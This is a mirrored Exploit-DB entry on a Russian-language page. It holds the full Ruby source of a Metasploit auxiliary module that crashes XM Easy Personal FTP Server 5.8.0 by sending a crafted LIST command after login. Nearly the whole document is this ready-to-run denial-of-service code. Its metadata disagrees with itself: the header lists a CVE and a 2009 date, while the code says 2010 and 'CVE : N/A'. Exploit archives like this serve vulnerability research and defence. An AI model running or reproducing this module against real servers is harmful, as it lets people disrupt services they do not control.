- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9804
- Проверка EDB
-
- Пройдено
- Автор
- ZHANGMC
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2009-3643
- Дата публикации
- 2009-11-10
Код:
# Exploit Title: XM Easy Personal FTP Server LIST DoS (Meta)
# Date: 4/17/2010
# Author: Jeremiah Talamantes
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP, SP2
# CVE : N/A
# Code : http://www.redteamsecure.com/assets/company/exploits/xmftp/xmexploit.p
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# xmeasy580_list.rb
#
# XM Easy Personal FTP Server 5.8.0 LIST DoS
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 4/17/2010
#
# First you must login to the FTP server in order to execute the DoS
# attack. This module exploits a weakness in the LIST command.
#
# Discovered by: Jeremiah Talamantes
# RedTeam Security
# http://www.redteamsecure.com
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.8.0 LIST DoS',
'Description' => %q{
This module exploits a DoS vulnerability in the LIST command
in XM Easy Personal FTP Server 5.8.0. In order to execute this
exploit, you must first login to the FTP server. This was only
tested on Windows XP, SP2 (EN).
},
'Author' => 'Jeremiah Talamantes (RedTeam Security)',
'License' => MSF_LICENSE,
'Version' => '$Revision: 1234 $',
'References' => [
[ 'URL', 'None' ]
],
'DisclosureDate' => 'Apr 17 2010')
)
# Required settings
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
])
end
def run
return unless connect_login
raw_send("LIST \r\n")
disconnect
print_status("Check to see if the server is responding...")
end
end
- Источник
- www.exploit-db.com